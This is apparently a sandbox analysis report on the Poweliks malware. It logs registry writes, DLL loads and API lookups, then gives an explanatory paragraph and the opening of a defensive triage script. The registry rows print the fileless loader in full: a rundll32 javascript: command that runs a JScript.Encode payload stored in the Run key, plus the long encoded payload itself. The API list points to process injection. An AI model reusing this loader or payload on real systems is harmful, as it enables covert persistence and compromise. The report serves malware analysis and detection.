Write Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run data = #@~^kXcAAA==W!x^DkKxP^WTcV* ODH ax +h,)mDk\p64N+1YcJ\dX:s cj+M\n.oHSuP:n vcTr#IXRKw+ `r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn Nc#p.Y;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\pr(Ln^D`J j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92 \rDGUs+UYUODbxLdvJ]Ar NrDuE*i2{h3J-'/HdhKhc'-Ar NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW' nSP)1Yb\+or(%+1YcJUm.raYk LRwkVjz/D+sr8Ln^DJbi6;x1YrG Pm[Uv#`YMzPDnDEMxPmR"no"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw- nY,0.Cs+hG.0Pd+D;a-w Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PDY;DU~ZiN86;x1YrG PNc;* a' nSP)1Yb\+or(%+1YcJt/ah^ RUnD7+Do\JC:KhRRTE*iaRK2+ `E!AKJS;B0CVkn*iac/xNv#p;0 'CRA62C N2 -kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP6Yor^+cE6UD~OME~O8#pr0vEWY* ;WDRMrY`6c.n/aW /nAG[H#IE6OR;VGd`#I;6'WR;.lOK6Ywk^n`!0U~DD;n*iE6O'6RMOok^+vEWxObpEW/{;0DR62xbdP6O?D.lhv#pE0kR"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnVYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nYsrV`;W #i)Nh4kVcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2 \r.Kx:UYvJnMG^+k/r#b`ECr#xJbn6,`,P6Y 3 mGNbUTTl=bUZq&RVnYUY.k oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\x#;I&I28ycL}y]Fj!wXI!T|wOpI(Bt(#T\(qKiMOylo]24ycOH/6Heq*V5o]\1xV1xsIz[qj2(U$(.u^h\.Y9(U)3`MoXIqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4 ]2( qtm*;"M.sClVI_s;5qFa5Ts"^y.O5sa*nZ46\(mOPy95}qHZqog*1&I^4UX?\t/\HTm,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k8H*1&]V(?Xj\}ktg!lq1;S0.Dlpp;}o1"}qqk(Cs/9VdtV.zpqHN}pgyoKW+j #En?X2\t2(:.Anlt4qs%Kq,0N 6sF;9B40qV(1zjF-t_.d}U(k9!\t(C1^|UX2\tw(:#i(A^FZx1+`]s4V. 
5pIs#_VA}U(/&3HdI(1"JwAq5saa5zXK\sk}q}/5XymjHdI(1.J2wFNV194Vs.mzqd 81Xm2]V(?XH96TCq14m2]A} XV\ sZ}jTw}X]j($s5x.a8M"VmbX3}q}a4h.98y*"N_BFI&]-1kori^IPmV#Nl w/::sD}Uaqm]V5xsPmmkiCjk4Vs%qb6(jfV"[V.OS^BV\:asI&I28yc;pyok4!^E\!174 tV(x]w( X"oKW+i&"t4s]4mspk9oA4^ssO}o]V1x\2dV1s[AVOmVa^4 jE9MsZlq1E":at\&\G&V988x"w4qidKqs!5 Nst;q2rH]j($s5x.28VIsmbXA} \w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp sKm^d::.fiy6-N;aqlpx!9skqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!UqA(M.Otq*T5o]a4+lM(Ms mHLk`x#E9MsO\?6gelt}y#Vqb3Fmh.T[o9;q;]j($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6tq(:1ZCOEqV[4+8A4mhsO(;t8jVoXIqs9M.zFwA-mysZl OEhKbkKqoE\Mo!(&BXh?I`^xjV|jTL81ZmhV;t8!L9Aq\\C#d\?68iVsz5qq^N!jXnsA7mys!m1EhK3d:s!tMw!42BXnUI`mU.sFj!L8H!1:s;\F!LBwAz4yH^}ujX\?3F9wH*1&]V(jo"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\*T]V,O5qs!SV9V92s.my#YI:aw\(\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne("w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj*.e\VKsoTlo}^K .TCV,Vm.T3`&s"9M.O}o1"}qqb4u0E" .Z._sh\?Lk:s%1:,.8 \!S^[24NHHSs.;^ysh}`Xt9Ms+\jFs[Vt-}_\b|PDX\(I8ms*oxs#E1 oh\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np "31:..mH(wd3sE9:1.\?o08xj/4;a)|wY:+p1Ttq!;j #E9MsO\?*B8 Isms1Sj+jX9:VN}o\EUMoE\Mas`:.sp?4r}o^OKy9$} 1T(w1Xm2]V(?Xj9*TCqFsS0s!N!jX(&A:}oB mHV1XX(I*08Mj?}qeG|A*^NzFKesws52}oUXT`CIzFUhV.qX.5 \V::sZlotV:#!mM1V1X*_t("1}o]G4ypKqVNs[AF-}_#/\j44(:IdtUq2S0s!NhOD\?o04 #/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174 tV1x]N}L2!1:,D}:wy}:eTj2IHl *UF;9 oty\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(aG19Deja? 4t5qFq4 V##y.pI2$yq:1d":,!C_sHHsonjhw|qs$?sqwj.[Dj![-9.w782\h4V4a0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joAf$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt. AF$?o]~I3\n"CN~+w[cts4Ij2^Xmswgt2I6Io4Aq*t?o9VCVt%4saZMOeI!sHtA}"Iq]k}3\2Us9bj skt3XZf$pgsw_ix^l.yB(js9W+hH* 0}+}ZHHjts:21pe`Isj2[\}og(:M1`pZXq:[vd&s+wUikDw4wo 4`In. 
}CCN9flZe65:Os"Z,fn_3+48)7I34Igj%WlGov(&]5!sT5FAx[2js?Vs3s} pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\s|qM#XUV9^i!\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\w:2Ix58$!9FB2m(2P" mH f4Apj$Jljj.H!w# ws$SZsh`:tP:s9hn`6e}^oAHV^h"j90p:t?5LHI\so;dF9snj":} [652.oI!}h[Z*Vj`1|\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$"CVA^Mg250(apsYGI/Y$6o3+1w)!"fH#"MVe _m-HwLZlP~5g2%SVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA"f1yro2." 1Adys9UV9sCj\&pUOoIsNwpisB[A6 ?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C3!Z[2Df?oHXK.o8HVs-[0,G5yAh"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15xA~FygKNy(-js}:IuN2t..i}^B*VsT9FA$i_N21Gt~piwA5m.NZB25j(h`FVa}2s"njX2N8$B.q5l.%IB8A5q?j4A\2Hq:stfi`Ie}s2H?!Oy"MtNpN#Z`?dy9!1"UM3S\y";.joBpq6AS+Is#;, }0H|5K]}"29BP:N$?w40lP~5gMmW58#xL4A\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\j*$iAVUH^LSpiOyt:3XV[njVLhI&2p:V}yCV& 4^o2l^tM? V _N31yH5q:1e` I$n`qTNN45piwA"fA~KjBA`xo2C[\dFIs}LAFp`ear`s5K+3"]`.G}^G69y]TU.AB[AF9py4Xpi9\5k%..`sA}MG\tM#"5!!W}:\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js"\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\j2!l? oCj:*y}ssT"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\xtUi`N$IN#0."49"jsV.ZA&:M[A"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi"Z5jsxNN]W\LVh` 1T"3.x\j^Aq1]j`V`j+IhC29fjj$qIjo$`js$}^s5j#~roz\dF.5S8[wts#9Uy4%"s9"nsA\H8##.b%7.z%"#`F5j#A}s)-dF.}6:s9jG4qpi"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[ 1U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I +os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!"cpos6lV9+rj%-6js NN4`2]/5js}6:s9jG4qmT"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\H%-H`HrmMBigX%-6j2-+wt~KijA5tNpN$qKBM9V)"dX%Z82I6?:o!+A}A?o9%CAs$p`oA, size = 61268, type = REG_SZ True 6
Fn
Write Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run data = rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>"), size = 464, type = REG_SZ True 2
Fn
Write Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run data = #@~^kXcAAA==W!x^DkKxP^WTcV* ODH ax +h,)mDk\p64N+1YcJ\dX:s cj+M\n.oHSuP:n vcTr#IXRKw+ `r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn Nc#p.Y;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\pr(Ln^D`J j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92 \rDGUs+UYUODbxLdvJ]Ar NrDuE*i2{h3J-'/HdhKhc'-Ar NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW' nSP)1Yb\+or(%+1YcJUm.raYk LRwkVjz/D+sr8Ln^DJbi6;x1YrG Pm[Uv#`YMzPDnDEMxPmR"no"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw- nY,0.Cs+hG.0Pd+D;a-w Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PDY;DU~ZiN86;x1YrG PNc;* a' nSP)1Yb\+or(%+1YcJt/ah^ RUnD7+Do\JC:KhRRTE*iaRK2+ `E!AKJS;B0CVkn*iac/xNv#p;0 'CRA62C N2 -kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP6Yor^+cE6UD~OME~O8#pr0vEWY* ;WDRMrY`6c.n/aW /nAG[H#IE6OR;VGd`#I;6'WR;.lOK6Ywk^n`!0U~DD;n*iE6O'6RMOok^+vEWxObpEW/{;0DR62xbdP6O?D.lhv#pE0kR"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnVYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nYsrV`;W #i)Nh4kVcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2 \r.Kx:UYvJnMG^+k/r#b`ECr#xJbn6,`,P6Y 3 mGNbUTTl=bUZq&RVnYUY.k oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\x#;I&I28ycL}y]Fj!wXI!T|wOpI(Bt(#T\(qKiMOylo]24ycOH/6Heq*V5o]\1xV1xsIz[qj2(U$(.u^h\.Y9(U)3`MoXIqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4 ]2( qtm*;"M.sClVI_s;5qFa5Ts"^y.O5sa*nZ46\(mOPy95}qHZqog*1&I^4UX?\t/\HTm,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k8H*1&]V(?Xj\}ktg!lq1;S0.Dlpp;}o1"}qqk(Cs/9VdtV.zpqHN}pgyoKW+j #En?X2\t2(:.Anlt4qs%Kq,0N 6sF;9B40qV(1zjF-t_.d}U(k9!\t(C1^|UX2\tw(:#i(A^FZx1+`]s4V. 
5pIs#_VA}U(/&3HdI(1"JwAq5saa5zXK\sk}q}/5XymjHdI(1.J2wFNV194Vs.mzqd 81Xm2]V(?XH96TCq14m2]A} XV\ sZ}jTw}X]j($s5x.a8M"VmbX3}q}a4h.98y*"N_BFI&]-1kori^IPmV#Nl w/::sD}Uaqm]V5xsPmmkiCjk4Vs%qb6(jfV"[V.OS^BV\:asI&I28yc;pyok4!^E\!174 tV(x]w( X"oKW+i&"t4s]4mspk9oA4^ssO}o]V1x\2dV1s[AVOmVa^4 jE9MsZlq1E":at\&\G&V988x"w4qidKqs!5 Nst;q2rH]j($s5x.28VIsmbXA} \w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp sKm^d::.fiy6-N;aqlpx!9skqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!UqA(M.Otq*T5o]a4+lM(Ms mHLk`x#E9MsO\?6gelt}y#Vqb3Fmh.T[o9;q;]j($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6tq(:1ZCOEqV[4+8A4mhsO(;t8jVoXIqs9M.zFwA-mysZl OEhKbkKqoE\Mo!(&BXh?I`^xjV|jTL81ZmhV;t8!L9Aq\\C#d\?68iVsz5qq^N!jXnsA7mys!m1EhK3d:s!tMw!42BXnUI`mU.sFj!L8H!1:s;\F!LBwAz4yH^}ujX\?3F9wH*1&]V(jo"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\*T]V,O5qs!SV9V92s.my#YI:aw\(\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne("w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj*.e\VKsoTlo}^K .TCV,Vm.T3`&s"9M.O}o1"}qqb4u0E" .Z._sh\?Lk:s%1:,.8 \!S^[24NHHSs.;^ysh}`Xt9Ms+\jFs[Vt-}_\b|PDX\(I8ms*oxs#E1 oh\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np "31:..mH(wd3sE9:1.\?o08xj/4;a)|wY:+p1Ttq!;j #E9MsO\?*B8 Isms1Sj+jX9:VN}o\EUMoE\Mas`:.sp?4r}o^OKy9$} 1T(w1Xm2]V(?Xj9*TCqFsS0s!N!jX(&A:}oB mHV1XX(I*08Mj?}qeG|A*^NzFKesws52}oUXT`CIzFUhV.qX.5 \V::sZlotV:#!mM1V1X*_t("1}o]G4ypKqVNs[AF-}_#/\j44(:IdtUq2S0s!NhOD\?o04 #/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174 tV1x]N}L2!1:,D}:wy}:eTj2IHl *UF;9 oty\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(aG19Deja? 4t5qFq4 V##y.pI2$yq:1d":,!C_sHHsonjhw|qs$?sqwj.[Dj![-9.w782\h4V4a0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joAf$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt. AF$?o]~I3\n"CN~+w[cts4Ij2^Xmswgt2I6Io4Aq*t?o9VCVt%4saZMOeI!sHtA}"Iq]k}3\2Us9bj skt3XZf$pgsw_ix^l.yB(js9W+hH* 0}+}ZHHjts:21pe`Isj2[\}og(:M1`pZXq:[vd&s+wUikDw4wo 4`In. 
}CCN9flZe65:Os"Z,fn_3+48)7I34Igj%WlGov(&]5!sT5FAx[2js?Vs3s} pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\s|qM#XUV9^i!\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\w:2Ix58$!9FB2m(2P" mH f4Apj$Jljj.H!w# ws$SZsh`:tP:s9hn`6e}^oAHV^h"j90p:t?5LHI\so;dF9snj":} [652.oI!}h[Z*Vj`1|\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$"CVA^Mg250(apsYGI/Y$6o3+1w)!"fH#"MVe _m-HwLZlP~5g2%SVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA"f1yro2." 1Adys9UV9sCj\&pUOoIsNwpisB[A6 ?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C3!Z[2Df?oHXK.o8HVs-[0,G5yAh"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15xA~FygKNy(-js}:IuN2t..i}^B*VsT9FA$i_N21Gt~piwA5m.NZB25j(h`FVa}2s"njX2N8$B.q5l.%IB8A5q?j4A\2Hq:stfi`Ie}s2H?!Oy"MtNpN#Z`?dy9!1"UM3S\y";.joBpq6AS+Is#;, }0H|5K]}"29BP:N$?w40lP~5gMmW58#xL4A\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\j*$iAVUH^LSpiOyt:3XV[njVLhI&2p:V}yCV& 4^o2l^tM? V _N31yH5q:1e` I$n`qTNN45piwA"fA~KjBA`xo2C[\dFIs}LAFp`ear`s5K+3"]`.G}^G69y]TU.AB[AF9py4Xpi9\5k%..`sA}MG\tM#"5!!W}:\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js"\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\j2!l? oCj:*y}ssT"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\xtUi`N$IN#0."49"jsV.ZA&:M[A"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi"Z5jsxNN]W\LVh` 1T"3.x\j^Aq1]j`V`j+IhC29fjj$qIjo$`js$}^s5j#~roz\dF.5S8[wts#9Uy4%"s9"nsA\H8##.b%7.z%"#`F5j#A}s)-dF.}6:s9jG4qpi"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[ 1U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I +os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!"cpos6lV9+rj%-6js NN4`2]/5js}6:s9jG4qmT"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\H%-H`HrmMBigX%-6j2-+wt~KijA5tNpN$qKBM9V)"dX%Z82I6?:o!+A}A?o9%CAs$p`oA, size = 61268, type = REG_SZ True 2
Fn
Module (107)
Operation Module Additional Information Success Count Logfile
Load KERNEL32.DLL base_address = 0x76f00000 True 1
Fn
Load ntdll.dll base_address = 0x77c60000 True 1
Fn
Load WS2_32.dll base_address = 0x75820000 True 1
Fn
Load SHLWAPI.dll base_address = 0x776e0000 True 1
Fn
Load WININET.dll base_address = 0x77370000 True 1
Fn
Load RPCRT4.dll base_address = 0x76bf0000 True 1
Fn
Load imagehlp.dll base_address = 0x76b00000 True 1
Fn
Load USERENV.dll base_address = 0x75710000 True 1
Fn
Load ADVAPI32.dll base_address = 0x76b50000 True 1
Fn
Load ole32.dll base_address = 0x77210000 True 1
Fn
Load msvcrt.dll base_address = 0x75860000 True 1
Fn
Get Handle c:\windows\syswow64\ntdll.dll base_address = 0x77c60000 True 1
Fn
Get Handle c:\windows\syswow64\ws2_32.dll base_address = 0x75820000 True 1
Fn
Get Handle c:\windows\syswow64\shlwapi.dll base_address = 0x776e0000 True 1
Fn
Get Handle c:\windows\syswow64\wininet.dll base_address = 0x77370000 True 1
Fn
Get Handle c:\windows\syswow64\rpcrt4.dll base_address = 0x76bf0000 True 1
Fn
Get Handle c:\windows\syswow64\imagehlp.dll base_address = 0x76b00000 True 1
Fn
Get Handle c:\windows\syswow64\userenv.dll base_address = 0x75710000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76f00000 True 3
Fn
Get Handle c:\windows\syswow64\advapi32.dll base_address = 0x76b50000 True 1
Fn
Get Handle c:\windows\syswow64\ole32.dll base_address = 0x77210000 True 1
Fn
Get Handle c:\windows\syswow64\dllhost.exe base_address = 0xa50000 True 1
Fn
Get Filename c:\windows\syswow64\dllhost.exe process_name = c:\windows\syswow64\dllhost.exe, file_name_orig = C:\Windows\syswow64\dllhost.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76f11856 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x76f11245 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76f11222 True 2
Fn
Get Address c:\windows\syswow64\ntdll.dll function = atoi, address_out = 0x77cad2f3 True 2
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 16, address_out = 0x75826b0e True 2
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = StrStrA, address_out = 0x7770c45b True 2
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetCrackUrlA, address_out = 0x7737d075 True 2
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidCreateSequential, address_out = 0x76c17c12 True 2
Fn
Get Address c:\windows\syswow64\imagehlp.dll function = CheckSumMappedFile, address_out = 0x76b08303 True 2
Fn
Get Address c:\windows\syswow64\userenv.dll function = CreateEnvironmentBlock, address_out = 0x75711a7a True 2
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x76b6469d True 2
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitialize, address_out = 0x7722b636 True 2
Fn
Get Address c:\windows\syswow64\ntdll.dll function = sscanf, address_out = 0x77d354a7 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = strncpy, address_out = 0x77cd5c30 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = ZwSetValueKey, address_out = 0x77c801b4 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = ZwQueryValueKey, address_out = 0x77c7fa98 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = ZwQueueApcThread, address_out = 0x77c7ff14 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = ZwCreateKey, address_out = 0x77c7fb30 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = RtlRandom, address_out = 0x77d298c3 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = _snprintf, address_out = 0x77d34760 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = _vsnprintf, address_out = 0x77cd9d88 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = RtlImageNtHeader, address_out = 0x77c93164 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = _chkstk, address_out = 0x77c9ad68 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = memset, address_out = 0x77c8df20 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 115, address_out = 0x75823ab2 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 3, address_out = 0x75823918 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 19, address_out = 0x75826f01 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 4, address_out = 0x75826bdd True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 52, address_out = 0x75837673 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 23, address_out = 0x75823eb8 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathUnquoteSpacesA, address_out = 0x7770ecc7 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindFileNameA, address_out = 0x776f00aa True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = StrCmpNIA, address_out = 0x776ed11c True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = StrChrA, address_out = 0x776ec5e6 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = StrStrIA, address_out = 0x776ed250 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitThread, address_out = 0x77cbd598 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76f17a10 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x76f114b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventA, address_out = 0x76f1328c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateThread, address_out = 0x76f17a2f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WinExec, address_out = 0x76f92c21 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76f11282 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x76f153c6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTempFileNameA, address_out = 0x76f39d3f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTempPathA, address_out = 0x76f3276c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x76f110ff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76f2d802 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetExitCodeThread, address_out = 0x76f2d5b5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x76f11136 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ResumeThread, address_out = 0x76f143ef True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteProcessMemory, address_out = 0x76f2d9e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAllocEx, address_out = 0x76f2d9b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x76f11072 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExpandEnvironmentStringsA, address_out = 0x76f2eb39 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x76f1110c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76f13519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76f11410 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x76f149d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpiA, address_out = 0x76f13e8e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76f111c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76f1186e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x76b614d6 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x76b646ad True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExA, address_out = 0x76b648ef True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExA, address_out = 0x76b614b3 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCreateKeyExA, address_out = 0x76b61469 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenProcessToken, address_out = 0x76b64304 True 1
Fn
Get Address c:\windows\syswow64\msvcrt.dll function = _beginthreadex, address_out = 0x7587132e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsWow64Process, address_out = 0x76f1195e True 2
Fn
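The Registry and Module tables above record the two halves of the Poweliks persistence mechanism: a 464-byte Run value that makes rundll32.exe load mshtml and run a javascript: URL, which in turn calls WScript.Shell.RegRead to fetch a second, 61268-byte Run value that starts with the JScript.Encode header "#@~^"; and, in the same process, GetProcAddress lookups for CreateProcessA, VirtualAllocEx, WriteProcessMemory, ZwQueueApcThread and ResumeThread, the API set behind the Modify Memory / Modify Control Flow rows targeting powershell.exe listed under Injection Information. The Python below is an added triage script, not part of the VMRay report or of the malware, that parses rows in the shape of those tables and flags both patterns. The sample text is constructed: the two rundll32 / "#@~^" rows are copied from this report with the encoded value cut after its first bytes, the updater.exe row is an invented benign entry, and the alias names CreateProcessW, NtQueueApcThread and QueueUserAPC in the role table are assumptions added for generality, not names taken from the page.

```python
import re
from typing import Dict, List, Optional, Set

# Constructed sample in the shape of the Registry and Module table rows above.
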